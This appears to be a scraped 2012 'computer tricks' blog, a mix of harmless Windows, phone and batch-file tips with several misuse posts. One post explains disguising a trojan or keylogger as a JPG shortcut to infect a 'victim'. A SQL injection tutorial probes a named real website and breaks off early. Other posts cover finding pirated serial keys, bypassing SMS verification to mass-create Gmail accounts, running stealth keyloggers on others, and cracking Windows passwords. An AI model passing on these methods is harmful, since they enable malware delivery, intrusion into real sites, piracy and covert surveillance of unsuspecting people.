echo. º%MAY:~21,20%º º%JUN:~21,20%º º%JUL:~21,20%º º%AUG:~21,20%º
echo. º%MAY:~42,20%º º%JUN:~42,20%º º%JUL:~42,20%º º%AUG:~42,20%º
echo. º%MAY:~63,20%º º%JUN:~63,20%º º%JUL:~63,20%º º%AUG:~63,20%º
echo. º%MAY:~84,20%º º%JUN:~84,20%º º%JUL:~84,20%º º%AUG:~84,20%º
echo. º%MAY:~105% º º%JUN:~105% º º%JUL:~105% º º%AUG:~105% º
echo. ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
echo.
echo. ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo. º SEPTEMBER º º OCTOBER º º NOVEMBER º º DECEMBER º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º ºS M T W T F S º
echo. ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
echo. º%SEP:~0,20%º º%OCT:~0,20%º º%NOV:~0,20%º º%DEC:~0,20%º
echo. º%SEP:~21,20%º º%OCT:~21,20%º º%NOV:~21,20%º º%DEC:~21,20%º
echo. º%SEP:~42,20%º º%OCT:~42,20%º º%NOV:~42,20%º º%DEC:~42,20%º
echo. º%SEP:~63,20%º º%OCT:~63,20%º º%NOV:~63,20%º º%DEC:~63,20%º
echo. º%SEP:~84,20%º º%OCT:~84,20%º º%NOV:~84,20%º º%DEC:~84,20%º
echo. º%SEP:~105% º º%OCT:~105% º º%NOV:~105% º º%DEC:~105% º
echo. ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
GOTO loop

 

Matrix Falling Code Effect - Notepad trick

Be The First To Comment
Matrix Falling Code Effect - Notepad trick

Inspired by the movie Matrix, this falling code trick is extremely popular on social networking websites.

1. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or*.bat.

2.

@echo off
color 02
:tricks
echo%random%%random%%random%%r​andom%%random%%random%%random%​%random%
goto tricks

3.Upon running the bat file, you will see the "Matrix falling code" effect.

A Wearable Motorcycle

Be The First To Comment
A Wearable Motorcycle

Jake Loniak is a college junior; he's also the inventor of one of the most innovative concept vehicles we've seen in ages. Inside: the electric exoskeleton motorcycle and an exclusive video of the beast in action

Skele-Cycle Thirty-six pneumatic muscles control this wearable motorcycle, taking commands from the rider’s body movements.


At Ease: Once the bike is parked, the rider can strap it on like a suit.

Actually, to call Deus a “motorcycle” is a bit of a stretch. It would stand vertically when parked, so that the rider can step in and strap the bike on like a full-body suit.

A computer would interpret the rider’s body movements, translate those into directional commands for the motorcycle, and steer the bike using 36 pneumatic muscles (artificial muscles made by the German company Festo that inflate or deflate to change the direction).

“It’s like riding two skateboards at once, but stable, because the machine supports the rider’s body,” Loniak explains. These two skateboards, however, would be powered by lithium-ion batteries and ultracapacitors and capable of hitting 75 mph. “I never envisioned this as a commuter,” he says. “This is a sport bike.”

WHAT’S NEXT

Deus exists only in a few deceptively realistic computer illustrations, but Loniak is confident that it can be built. “I believe a working prototype could be made, but it would take a great deal of time and engineering,” he says. The basic technology already exists; the Watertown, Massachusetts, start-up A123 is already selling the lithium-ion batteries Loniak wants to use, and a number of companies are developing ultracapacitors for electric cars and hybrids. “This isn’t fantasy,” he says. “It’s a green vehicle, and all of the numbers are based in the real world.”



How To Get The Serial Number Your Needed product

Be The First To Comment
How To Get The Serial Number You Need

* Go to Google.

* In the search field type: "Product name" 94FBR

* Where, "Product Name" is the name of the item you want to find the serial number for.

* And voila - there you go - the serial number you needed.

See these example searches:

"Photoshop 7" 94FBR
"Age of Mythology" 94FBR
"Nero Burning Rom 5.5" 94FBR

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

How To remove TimeLine From Your FB Account(Firefox,Chrome,Internet Explorer,Safari)

Be The First To Comment
Near About 10,000 users daily search on the internet that "How To Remove Timeline Form your Facebook Account"and here i am with a superb and easy trick to remove Timeline from your Facebook Account.




One foreign friend make some extensions of different-different browsers to remove Time Line and made a website named: TimeLine Remove

ON THE ABOVE WEBSITE(TimeLine Remove)



YOU SEE SOMETHING LIKE THIS:



Install Extension(Add on) in your browser and Access(Browse) Facebook.

Now you can't get "TIMELINE"

Unknown China Mobile secrete codes

Be The First To Comment
Normally we know about secrete codes of mobile phones like Nokia,Samsung,etc.,but in this post i am reveling about secrete codes of china mobile.These codes works with various China mobile Phones such as Alkatel, Sigmatel, Carboonn, GFive and more such China Mobile phones.



Codes

1.)Default user code : 1122, 3344, 1234, 5678

2.)Engineer mode : *#110*01#

3.)Factory mode : *#987#

4.)Enable COM port : *#110*01# -> Device -> Set UART -> PS Config -> UART1/115200

5.)Restore factory settings : *#987*99#

6.)LCD contrast : *#369#

7.)Software version : *#800#

8.)Software version : *#900#

9.)Set default language : *#0000# Send

10.)Set English language : *#0044# Send

11.)Set English language (new firmware) : *#001# Send

Trick to use mouse with the help of keyboard

Be The First To Comment
Instructions

1.First of all click on start button by pressing windows key on your Keyboard.



2.Than with the help of arrow keys navigate to Control Panel option and than press enter.



3. Now again with the help of arrow keys navigate to Accessibility Options and than press enter.



4.In the next window,go to mouse option by pressing Tab button  9 times and than pressing right arrow key.



5.Now again press Tab button and than Space-bar to select Use Mouse Keys Option.



6.You can also change the mouse pointer options such as its speed, Acceleration by going to Settings option.



7.Than with the help of Tab button go to OK option and than press enter.



8.If every thing will be done correctly than you will be able to see a mouse icon in the system try near the system time.




9.Now you can move mouse pointer with the help of buttons 7,8,9,4,6,1,2,3 on the Numpad.Button 5 on the Numpad can be used to perform mouse’s left button function.



Note: To control mouse pointer with keyboard the Num Lock key must be on.

6-useful-websites-to-help-you-learn-coding

Be The First To Comment
If you are enthusiastic about learning the language of the Internet, then this post will surely help you attain your goal. Over in this post we have listed down six useful websites, which will help you learn the basics and fundamental principles of coding (HTML, JavaScript, CSS etc.).

The six websites are as follows:

1. W3school



W3School is one of the best places on the Internet if you are looking for a “complete” learning database for Internet languages, including – HTML, Scripting, XML, Web Services and Web Building.



The W3School also provides the user with an online certification program for anyone who wishes to become certified in some of the most popular Internet languages.

One of the best features found in W3School is the “Try It Yourself Editor” which gives the users an opportunity to experiment with the different Internet languages as they learn. Moreover, as the famous quote goes “Practice makes perfect”.

Apart from the detailed descriptions, references and clear explained tutorials, the website also has Quiz Test available for users who wish to test their knowledge.

W3school

2. Web DevelopersNotes



Web Developers Note is an online database that has a sufficient amount of data regarding the different Internet languages – HTML, JavaScript, SQL, and many others.



The user can browse the different languages through the left-hand side menu and choose the language, which they wish to learn.

Once on the language page, you can view all the tutorials, tips and tricks below.

Web DevelopersNotes

23

3. WebDesign Library



WebDesign Library is a constantly updated website that provides users with tutorials and guides regarding many different Internet languages such as CMS, HTML and CSS, PHP and many other languages are present.



The languages can be browsed and picked through the menu found on the left-hand side.

Once on the page, you can view all the tutorials regarding the language, which also shows you the experience level of the tutorial, which ranges from Beginners to Professionals.

Another great feature on the website are the comments found below each tutorial which further improve the learning level of the user as users ask and get responded on different types of problems.

WebDesign Library

4. Quackit



QuackIt is an online portal for learning many different Internet languages such as – HTML, CSS, Database, XML and more.



The website provides user with a simple user-friendly layout to search the language they are looking to learn and then below it provides them links to tutorials regarding that language.23

The tutorial gives you a clear, well-defined tutorial showing you the codes, explaining them and showing you the output that should result from the given code.

Quackit

5. WebMonkey



WebMonkey is an online website for learning Internet coding (languages). The popular folks who founded WIRED.com made the website, WebMonkey.



The section that covers all the different Internet languages is “Web Dev & Design”. Under this, you can find all the Internet coding languages, such as – Ajax, CSS, HTML5 and many other popular ones too.

Unlike other websites, WebMonkey has a more “blog like” layout, which is easy to use, and browse. WebMonkey provides the users with Cheat Sheets and Cut & Paste Codes for the users who wish to save some time.

WebMonkey

6. HTML Code Tutorial



HTML Code Tutorial provides users with helpful and complete guides to creating web pages. The website has a list of tutorials to browse through, for HTML and CSS.



The experience level of each tutorial varies and ranges from tutorials for beginners to tutorials for experts and professionals.

Just like QuackIt, HTML Code Tutorial gives users the code and the result that results from that code which is helpful for users, as they know what they have to expect from the code.

HTML Code Tutorial

These are some of the six well organized and updated websites on the Internet for learning Internet languages. The tutorials are broken down into many smaller parts so learning a language was never easier.

Create Files & Folders With No Name

Be The First To Comment
This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select ‘Rename’ or simply press ‘F2′.

3) Press and hold the ‘Alt’ key. While holding the Alt key, type numbers ’0160′ from the numpad.

Note :- Type the numbers ’0160′ from the numpad, that is, the numbers present on the right side of the keyboard.

Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces.

Just follow the steps given below :-

1) Select file, Press ‘F2′.

2) Hold ‘Alt’ key and type ’0160′ from the numpad.

3) Release the ‘Alt’ key. Now without doing anything else, again hold ‘Alt’ key and type ’0160′.

4) Press ‘Enter’ and you will have second nameless file in the same directory.

5) Repeat step 3 to create as many nameless files or folders in the same directory.

(We have a problem with deleting these folders, to do so, start your computer in ‘Safe Mode’ and delete it from there.)

HOW TO RESET MEMORY CARD PASSWORD IN NOKIA?

Be The First To Comment
If you have a symbian phone and you have forgotten your memory card then you can easily get your password by using this simple trick.This trick works only on nokia symbian phones not on the java phones.Before starting the tutorial on “Tricks To Reset Memory card Password In Nokia” Here are the the requirements

X-plore application (You can easily find its trial version for Free)

Nokia symbian mobile phone.

The X-plore application is used to view the data files of the phone.



Here Is the step by step tutorial For resetting the password.

1. Install the X-plore application in your nokia phone.

2. Now start your X-plore application and press 0(zero) button and select “ show the system files ”.This will make the X-plore application to show your system files.

3. After completing the above step goto C:/Sys/Data/MmcStore

4. Now press 3 button from your keypad and you will see options.Now click on the Hex-viewer option.This will make your phone to show files in hexadecimal.

5. Look at the 3rd Column On the screen you will see a code like ! TMSD02G (c??”?x???6?2?6?2?6) .Note down the numbers present between the ?.This is your memory card password.Like in this example the password is 62626.

6. Now you can enter the password and view your memory card files or you can reset your memory card password to a more memorable password.

Remember you can gain access to C:/Sys/Data/ if and only if you have set a password on your memory card

Remove virus from pendrive

Be The First To Comment
If you are using pendrive for data transfer at school, college or at your office or any where

you must have come across the VIRUS creates an exe file in your usb drive with the name New Folder.exe.



WITH THIS VIRUS



Task manager is disabled.

Registry Editor is disabled.

Folder options not working.

Taking too much time for accessing pendrive.

Uses half of your computers processing power.



now you can easily remove this virus

Just download the tool from the link below.

Run this downloaded exe by double clicking on it.

Then click on “Delete Autorun.inf file”.





After that click on ” Remove virus from USB”. The virus will be removed from your pendrive.

with this tool you cal also restore your task manager, registry editor and other things which were disabled by virus

just click on “Restore Default Windows Settings”.

Click here to download

http://www.brothersoft.com/smart-virus-remover-270067.html

How to Send Colorful Text in Facebook Chat

Be The First To Comment
Facebook has restricted its user to chat in black text due concerns of server overloading and speed. But now you are no longer bound to chat in black text. There are some special codes for you that empower you to send colourful text in chat. This trick is solely based on the fact that when profile ID’s are inserted in between square brackets, it automatically transforms into the profile picture. These ID’s are specially created for this purpose.

You can also send messages in colourful text but these codes will not work in Status update. This will also not work if the other person is using chat from his mobile.


How to Send Colourful Text in Facebook Chat:Here is the list of codes with their alphabets.

[[107015582669715]] = A

[[116067591741123]] = B

[[115602405121532]] = C

[[112542438763744]] = D

[[115430438474268]] = E

[[109225112442557]] = F

[[111532845537326]] = G

[[111356865552629]] = H

[[109294689102123]] = I

[[126362660720793]] = J

[[116651741681944]] = K

[[115807951764667]] = L

[[106596672714242]] = M

[[108634132504932]] = N

[[116564658357124]] = O

[[111669128857397]] = P

[[107061805996548]] = Q

[[106699962703083]] = R

[[115927268419031]] = S

[[112669162092780]] = T

[[108983579135532]] = U

[[107023745999320]] = V

[[106678406038354]] = W

[[116740548336581]] = X

[[112416755444217]] = Y

[[165724910215]] = Z

How to Use it:To create a word of colourful text copy the codes of alphabets and make sure to insert single space between the each alphabetic code. Here is the code for COMPUTER TRICKS.

COMPUTER: [[115602405121532]] [[116564658357124]] [[106596672714242]] [[111669128857397]] [[108983579135532]] [[112669162092780]] [[115430438474268]] [[106699962703083]]

TRICKS: [[112669162092780]] [[106699962703083]] [[109294689102123]] [[115602405121532]] [[116651741681944]] [[115927268419031]]

How to Change Windows 7 Password without Knowing Current Password

Be The First To Comment
There are various methods to bypass windows 7 password protection.In case you forgot windows passsword,you can reset it using windows 7 Dvd or OfflineNT Password and Registry Editor.However if you have access to any windows account then you can change the password without knowing current password.



How to Change Window 7 Password without Knowing Current Password:

Method 1:



Go to Control Panel and click on the Administrative Tools.

Under this section double click on Computer Management.

Select System Tools from right window pane.


Under this, just double click on Local Users and Groups and then on Users

Now you will see all the login accounts of your computer. Right click on any the account whose password you want to change and then click on Set Password.



A warning message will popup on your screen just click on Proceed button.



Now enter your New Password and click on OK button.


That’s it! your windows 7 password is changed without knowing current password. The only limitation of this method is that your current account should have Administrative privileges.



Method 2:



If you love to be work on Command Line then this method is for you.



Open command prompt by typing with administrative privileges .( Type CMD in start, right click on it and select Run as Administrative )





In the CMD window type the following command and hit Enter



net user Account Name Your New Password




In this command replace Account Name by the account name (Account Name is case sensitive) whose password you want to change and replace Your New Password by the password that you want to set.


Now if everything goes alright you will see “The command completed successfully” on your screen, now type exit command and hit Enter

This will reset your current windows password.

Trick to Lock Folder Without any Software

Be The First To Comment
Open Notepad [Start-->Run-->Notepad].

In your Notepad just Copy/Paste the below code.

cls

:End

@ECHO OFF

title Folder Locker

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Locker goto MDLOCKER

:CONFIRM

echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==webchiller goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Locker

echo Locker created successfully

goto End



In the above batch code the password has been set as webchiller.You can change it by editing the following line

if NOT %pass%==webchiller goto FAIL





Now save this notepad file as yourfoldername.bat ,here .bat is extension of your file. For now I am creating pctipstricks.bat file.





Now a .bat (system) file will be created.





Double Click on this .bat file and you will see a Locker Folder at the same location where your .bat file is saved.





Double click on that Locker folder and store your personal data in it.

After storing all your data in that folder again double click on .bat file and press Y there to Lock the folder and press Enter.





Now your Locker will hide and only .bat file will be there.

Double Click on this .bat file and give your password (here webchiller) and hit Enter.



That’s it. Now every time you want to open your secret folder you have to enter the password. You can update this folder any time and infinite number of times.

Hide Entire Drives Partition Without Registry

Be The First To Comment
Hide Entire Drives Partition Without Registry

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.

DISKPART>

2) Then type "list volume"
The result will look something like one as shown below-



3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".

How to Bypass Any SMS Verification

Be The First To Comment
As we see a lot of websites like (Google,YouTube,Facebook etc) which want sms verification to confirm your mobile and to proven your identity.
So I am here with an amazing trick that "How to Bypass Any SMS Verification"

First of all you need to know "What is meaning of Bypass There"(lets take the example of Google here).

(Bypass means creating gmail account without SMS verification code that is generated by Google Systems to enforce users to enter their mobile numbers and receive the verification code) As users receive Google verification code, they have to enter it on the submission form and that is the only way to create Gmailz account. Unfortunately, your mobile number is only valid for only a few of Gmail accounts. So when you try to put same mobile number more than allowed number of times, Google System restricts you and you cant create more Gmail accounts.


I know you are just too frustrated with the SMS Verification code appearing again and again(to hiding your profile), because it never lets you create gmail account as many as you want.
So Here is a way to bypass gmail verification code that actually works?


Lets Start:



1. Visit Receive-Sms-Online


2. Copy One Of the two number written below and put in the fields where they are asking for sms registration(as it is your mobile number)


3. Then simply go back to Receive-Sms-Online and click the number you have selected there u will find your verification code sent by goggle, you tube ,Face book or other website.

Hide EXE File into JPG

Be The First To Comment
This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Wednesday 9 May 2012

Crack Windows Password Instantly

Be The First To Comment
Have you ever tried to log into a Windows computer for a few minutes and you finally realize that you forgot the password?




There’s a way to crack the password and it doesn’t involve reformatting and reinstalling Windows.
The solution is called @stake LC4 (formerly L0phtCrack), however since Symantec stopped development of L0phtcrack, I’m going to let you in on a program called LC5.
Just like L0phtCrack, LC5 attacks your Windows machine with a combination of dictionary and brute force attacks.
LC5 can crack almost all common passwords in seconds. More advanced passwords with numbers and characters takes longer.


The main purpose of the LCP program is user account passwords auditing and recovery in Windows NT/2000/XP.
I haven’t tested it against Windows Vista yet, so I’m not sure if it will work. Your mileage may very either way.
How it works:
Windows NT, 2000 and XP passwords are stored as encrypted hashes. LC5 attacks these hashes with hundreds of passwords per minute.
Eventually the correct password will be sent and then displayed to the screen.
Good intentions:
System administrators can find weak passwords within minutes. Sys admins can then change the passwords to make them more secure.
LC5 can be used to access computers of users who forget passwords.
In companies, it can be used to access computers of employees who have left the company.
Bad intentions:

Hackers can use LC5 to sniff passwords over networks.
Hackers can install this application onto a primary domain controller and steal hundreds of passwords within minutes.

Please note that I am not the author of this software. Be advised that if you use this software, you do so at your own risk without any warranty.
Download LC5 (v5.04):
English version (without installer, ZIP) – 1.86 MB
English version (without installer, RAR) – 1.66 MB
Software License: LCP is a freeware program. The program may be distributed under condition of saving all files contents and structure of installation package.
Instant Solution to Login To Windows
There is another solution that works instantly to remove all Windows Passwords. It will Remove, Unlock and Bypass lost/forgotten passwords including Administrator for Windows Vista, 2000, 2003 XP and NT.

Monday 7 May 2012

Post Blank Msg in Facebook

Be The First To Comment
Post Blank Msg in Facebook

1.In the comment box or status or Chat msg Now simply hold Alt and type 0173 and then release the button and click on post update.

2. That’s it now you will see your status with just your name and a like and comment option like below in the image.

So now simply post some blank status updates and comment on your friends status really amazing, so enjoy and if you like this please share this with all your friends.


C-BOT

Be The First To Comment
C-Bot Wall climbing Robot Prototype

~~Robots often look insect like, largely because of their jerky movements and exo-skeletal look, both of which are a result of them often being works in progress at the individual and overall state of the art. Making them climb walls and hang effortlessly off a ceiling just adds them looking particularly bug like.

~~There are a variety of movements and gripping mechanisms, from electromagnetic to air suction, however our favorite is the friction based tree climber.We will see them on our later posts of hackerkid .

~~Three symmetry axis enables the robots to move in different directions, without gearing. The complex leg architecture, qualifies the C-Bot to navigate and kind of edge or spherical surface – also vertical walls constitue no problem. C-Bot can be steered via GPS or a 3D-map with all required information can be uploaded on its hard disk.

~~The C-Bot may be peering thru your office window soon. Based on biomimetics, it uses a gecko’s innovative foot design as a template to climb walls without any artificial adhesion. Tho it may not look like it, a gecko’s foot is hairy, fine enough to only be seen on the micro level. This molecular adhesion, combined with C-Bot’s array of ultrasonic sensors means costly (and ugly) scaffolding may be obsolete. Theoretically you can build them big enough to carry a human. Now wouldn’t that be something!




Keyboard Ninja

Be The First To Comment
Keyboard Ninja: Kill Windows with the Blue Screen of Death in 3 Keystrokes

~~Have you ever wanted to show off your keyboard ninja skills by taking down Windows with just a couple of keystrokes? All you have to do is add one registry key, and then you can impress your friends… or use it to convince people to switch to Linux.

~~This isn’t a bug, it’s a “feature” in Windows that is designed to let users trigger a crash dump for testing purposes. There’s even a whole Microsoft KB article on the subject.

~~To enable this feature, open up regedit and then browse down to one of these keys, depending on your keyboard type:

USB Keyboard

HKEY_LOCAL_MACHINE\SYSTEM\Curr​entControlSet\Services\kbdhid\​Parameters

PS/2 Keyboard

HKEY_LOCAL_MACHINE\SYSTEM\Curr​entControlSet\Services\i8042pr​t\Parameters

~~Now right-click on the right-hand pane and add a new DWORD key named CrashOnCtrlScroll, giving it a value of 1.

~~Reboot your computer, and when it starts back up you can trigger the Blue Screen of Death by using the following keyboard shortcut:

~~Hold down Right Ctrl and hit Scroll Lock twice

~~To remove this “feature” you can just delete the registry key and then restart your computer again.

Please note that following this article WILL crash your computer… really isn’t very useful, but it’s lots of fun =)

10 Free Keyloggers to monitor your Local PC or Laptop!

Be The First To Comment
     Here is an exclusive list of top 10 free local keyloggers. However If you are planning to monitor only your PC or any PC which you have control of, then you can blindly go for “Hardware Keyloggers” as they are the safest keyloggers and operate in a complete stealth. If you Still wanna Prefer Free Keyloggers then below is the list of Free keyloggers that will really help you monitor your PC.

1) REFOG Free Edition
Refog Free Keylogger beats competition in two respects: it’s simple to use and it’s free. REFOG Free Keylogger can look after your children without them even noticing. Even technically minded children won’t detect the key logger when it runs in a stealth mode. The program removes all the shortcuts and can be accessed only through a hot key combination. Running unobtrusively from the moment the system boots, REFOG Free Keylogger keeps track of all typed or pasted text.

 Download link: here

2) Black box express
Simple to use monitoring of one local computer; Monitor Screen recordings, Programs, Keystrokes typed, Websites, Web Searches, Emails/Webmails/ Instant Messenger Chat sent and received. Alerts and Warnings instantly or as a summary on your e-mail or cell phone. everything for 100% Free. No strings attached.

 Download link: here

3) Personal keylogger
The Personal Keylogger application was designed to be a small tool that will allow you to secretly record all keystrokes and other input. All specific instructions are explained in the application. To exit it and receive your logs, you will need to enter in your keycode. If you have forgotten your keycode, you will need to restart the computer. Keycode is like password. To stop Personal keylogger, you can enter your keycode anywhere on the screen. Once you type-in your keycode, the keylogger will stop monitoring and the log.txt file will be created in your selected destination folder.

 Download link: here

4) Py keylogger
PyKeylogger is an easy-to-use and simple keylogger written in python. It is primarily designed for backup purposes, but can be used as a stealth keylogger, too. It does not raise any trust issues, since it is a short python script that you can easily examine. It is primarily designed for personal backup purposes, rather than stealth keylogging. Thus, it does not make explicit attempts to hide its presence from the operating system or the user. That said, the only way it is visible is that the process name shows up in the task list, so it is not immediately apparent that there is a keylogger on the system.
#Tip: Press and hold ‘left-CTRL + Right-CTRL + F12′ keys simultaneously to bring up the Control Panel (default password is blank).

 Download link: here

5) Heretic Macro
Heretic is a powerful tool that is able to record user events, such as mouse clicks and keys, into a C/Java-like script, and play that script either once or repeatedly. It has many commands for dynamic pixel-based botting, window based botting, and static botting/macro-ing (i.e. key presses, mouse clicks, mouse moves, and pauses).

 Download link: here

6) Ultimate Keylogger
Ultimate Keylogger Free is a free popular all-round monitoring solution. It runs in the background and monitors all typed keystrokes, applications, passwords, clipboard, email, and visited websites’ URLs. You can view the reports as HTML files. Ultimate Keylogger Free will help you to find out, what exactly took place in the system.

 Download link: here

7) Actual keylogger
It runs hidden in the background and automatically records all keystrokes (including Alt, Ctrl and other functional buttons). The interface can be password protected and the log files are encrypted. You can view the reports as HTML or plain text. In the hidden mode it is invisible in all operating systems.

 Download link: here

8) Revealer Keylogger Free Edition
Revealer Keylogger is surely the easiest and faster way to record keyboard inputs. There is almost nothing to configure, in fact everything is configured internally with the best settings. Free keylogger monitoring tool that logs every keystroke even passwords behind asterisks and conversations in common instant messengers. Its interface is password protected, the software does not appear in Add/Remove programs or in the taskbar.

 Download link: here

9) Romaco Keylogger
Romaco Keylogger is a small and easy to use tool that can log all key-presses that are made while it is running, and display them to you in its window. It automatically exports the logged text to a text file every 5 minutes, or manually. It can be hidden at the click of a button, and recalled by vigorously pressing one of the least used keys on the keyboard, the break key.

 Download link: here

10) KidLogger
KidLogger collects user activity journal on the Computer and creates detailed Analysis of the user activity available online. Creates the list of most used web sites. Record the text was typed on the keyboard in any application

 Download link: here

DELETE THE UNDELETEABLE

Be The First To Comment
1 Open the Task Manager.

2 Click on "Processes" tab.

3 Find the name of the file you can't delete and end that process.

4 Now try deleting the file. If this fails, continue....

5 If you already know the path to the file, skip to the 12th step.

6 Click on Start → Search → All Files and Folders.

7 Type the name of the undeletable file in the box shown.

8 Make sure the "Look In" box shows the correct drive letter.

9 Click Search and let the computer find the file.

10 Once the file is located, right-click on it and choose "Properties", make a note of the file location. Usually this is something similar to 'C:\Windows\System32\undel​etablefilesname.exe'.

11 Close the search box.

12 Click on Start → Run and type CMD and press Enter to open a Command Prompt window.

13 Leave the Command Prompt window open, but proceed to close all other open programs.

14 Click on Start → Run and type TASKMGR.EXE and press Enter to start Task Manager.

15 Click on the Processes tab, click on the process named Explorer.exe and click on End Process.

16 Minimize Task Manager but leave it open.

17 Go back to the Command Prompt window and change to the directory where the file is located. To do this, use the CD command. You can follow the example.

Example: to change to the Windows\System32 directory you would enter this command and Press Enter, 'cd \windows\system32'.

18 Use the DEL command to delete the offending file. Type DEL <filename> where <filename> is the file you wish to delete. Example: del undeletable.exe.

19 Use ALT-TAB to go back to Task Manager.

20 In Task Manager, click File, New Task and enter EXPLORER.EXE to restart the Windows shell.

21 Close Task Manager.

Sunday 6 May 2012

Learn How Hackers Hack Websites MYSQL Injection Tutorial

Be The First To Comment
                                                                   - SQL Injection -
This Article Is About how to Hack a website with SQL Injection.I and myblog Takes No responsibility for it,s misuse.ok.

we have a target http://www.allaboutcar.net/articles.php?topic=-3 let see if this is vnlnerable to sql Injection to check it put a ' in the end
http://www.allaboutcar.net/articles.php?topic=3'\

it gives a mysql Database error . that means its vnlnerable to sql injection .. ok lets get the cloumn numbers to do that u need this command "order by " .. put that in the end with count numbers
For Example:[-
http://www.allaboutcar.net/articles.php?topic=3 order by 1--
http://www.allaboutcar.net/articles.php?topic=3 order by 2--
http://www.allaboutcar.net/articles.php?topic=3 order by 3--

do that untill u get a error

